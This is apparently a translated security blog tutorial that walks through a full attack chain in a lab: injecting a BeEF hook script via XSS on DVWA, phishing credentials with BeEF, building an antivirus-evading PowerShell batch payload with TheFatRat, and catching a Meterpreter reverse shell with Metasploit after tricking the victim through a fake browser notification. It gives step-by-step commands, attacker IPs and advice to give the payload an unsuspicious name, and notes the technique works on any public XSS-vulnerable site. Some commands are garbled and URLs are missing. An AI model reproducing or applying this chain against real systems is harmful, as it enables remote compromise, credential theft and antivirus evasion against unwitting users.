This note will explore the life cycle of an attack, how a victim may be infected and what an attacker could do to avoid detection by antivirus systems (AV).
General description of the laboratory
According to the professional in cyber security, the first thing is to exploit a victim’s web browser using a tool called Browser Exploitation Framework or BeEF. It is a penetration test tool that focuses on the web browser, and can be found at:
This step uses a cross-site scripting vulnerability on a web server to attack the victim. The information security specialist told that the goal is to get a victim to explore a site and compromise their machine using BeEF. In this lab, the web server of the Damn Vulnerable web application (DVWA) was used. You could also insert your code into any web site or web application with public orientation that has cross-site scripting (XSS) vulnerabilities.
In the second part, TheFatRat is used to create and package a client attack script. The attack script TheFatRat is a batch file that will eventually make the victim run it on his own computer. PowerShell will be used to do this and we hope to avoid AV detection.
In the third step the infection of TheFatRat is completed by using BeEF to socially engineering the user when executes the batch file of TheFatRat attack. When this is done, a reverse Meterpreter shell is returned to the client.
Vulnerable web server:
In this test, DVWA was used as our web server since it has been developed in XSS vulnerabilities and we can exploit it. The cyber security researcher comment that it`s possible to use any website or web server that has XSS vulnerability. It could also trick the victim into going directly to BeEF’s ‘hooked’ website. The ISO DVWA v1.0.7 LiveCD image is being used for this project that can be downloaded at:
The test is performed with the following systems:
Attacker: Kali Linux, 192.168.99.130
Web Server with XSS vulnerability: DVWA, 192.168.99.129
Victim: Windows 10 (fully patched with Microsoft Defender), 192.168.99.131
Using the Kali Linux machine, the information security expert navigates to Applications / Social Engineering / Beef XSS Framework BeEF is started. The BeEF console looks like the following screenshot:
Note the URL of the hook’s webpage. BeEF should show this:
Now 127.0.0.1:3000 is changed to the IP address of the attacker. It looks like this:
<script src = “https://192.168.99.130:3000/hook.js”> </ script>
The correct syntax is noted and copied into a text editor for future use. This window is kept open for the rest of the test. The cyber security expert said that the BeEF administration console must be in the Kali Linux web browser it must be opened normally automatically after starting BeEF. If this does not happen go to the URL:
The username and password to BeEF is beef / beef
At this point the web browser opens, go to the DVWA server (the IP address is 192.168.99.129) and log in. The user name and password for DVWA are admin / password.
When using DVWA, the configuration is changed to low to provide XSS vulnerabilities. This is done from the Kali Linux attack box. Open a web browser and select DVWA Security. Change the security level to low and press send. It is noted that the security level has changed to low in the bottom of the web browser.
The next thing to do is select the XSS tab, and in the Kali web browser navigate to Tools / Web Developer / Inspector as shown below:
The inspector box of the web page will open. The professional in information security click inside the name field on the web page, and the inspector box will move to the web source code that corresponds to that section of the page. The maximum length is set to 10. Simply change this number to 100.
Now write the XSS script command in the name field:
<script src = “https://192.168.99.130:3000/hook.js”> </ script>
It is necessary to put something in the field of the message. Just enter something because it does not matter. Open another browser tab, and go to BeEF administration console. The BeEF administration console is located at:
The cyber security expert makes sure that the BeEF terminal window is still open. Again, the username and password are beef. Then from the victim’s machine (IP address 192.168.99.131) goes to the web server (DVWA, IP address 192.168.99.129). Log in again with the username and password of admin / password. Click on the XSS tab. You can see in the screenshot that the victim received a message.
Now returns to his Kali Linux machine and sees that the victim has been ‘hooked’ to BeEF. BeEF can perform a variety of social engineering attacks. Now click on the hooked browser, and then click on the command tab. From there, move on to Social Engineering. The information security researcher selects the pretty theft attack. When you select that attack, you can see how he can socially engineer the user into revealing their Facebook ID. When the user enters their credentials, they will be copied into your log.
The next step to using PowerShell is to distribute TheFatRat and evade AV detection. TheFatRat must be installed. Go to the TheFatRat directory in a new tab. When reach the main menu of TheFatRat, select option 6 – Create a bat + Powershell file (100% FUD).
Now you have to answer a list of questions:
LHOST: This is the IP address of the attack machine (Kali Linux).
LPORT: This is the port the victim will use for an outbound connection.
Output file: This is going to be the file the victim needs to run. Name it something unsuspicious so the victim will run it, such as update.
Type of Payload: Select Windows Reverse TCP Meterpreter
Leave the window open, minimize it, and open a new window.
Configuring the Metaploit Listener
Now the information security professional initiates a Metasploit listener. Then type msfconsole in a new terminal. When Metasploit is loaded, type the following commands, but remember to set the IP address and port as configured for the device when the attack batch file was created in TheFatRat.
msf> use multi/handler
msf exploit(multi/handler)> set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(multi/handler)> set LHOST 192.168.99.130
msf exploit(multi/handler)> set LPORT 443
Type exploit –j
Start the Apache web server, copy the attack script
The cyber security expert starts in a new window the web server by typing ‘service apache2 start’. Then, copy the file created with TheFatRat in the web server directory of the attack box by issuing the command ‘cp / var / www / html’.
At this moment the cyber security specialist is ready to exploit the victim by tricking her into executing the attack script that we created using TheFatRat. Now go back to the BeEF administration page. Check if the victim is still hooked. If not, you must reconnect them. When they are hooked, navigate to Social Engineering / Fake Notification Bar (Chrome).
Now change the URL of the notification of the default value (0.0.0.0:3000/dropper.exe) to the IP address of your attack machine and the name of the attack to that of the created script. Keep in mind that the Web server is enabled on the attack box and the attack script is copied (he called in lab2) to the Web root directory. The configuration reflects that.
Now the user gets prompted for your social engineering attack through their Web browser as shown below.
The user is prompted to run the file.
When the user runs the attack script, the information security researcher will have a reverse session on his Metasploit terminal window with a created session as shown below.
Working as a cyber security solutions architect, Alisa focuses on application and network security. Before joining us she held a cyber security researcher positions within a variety of cyber security start-ups. She also experience in different industry domains like finance, healthcare and consumer products.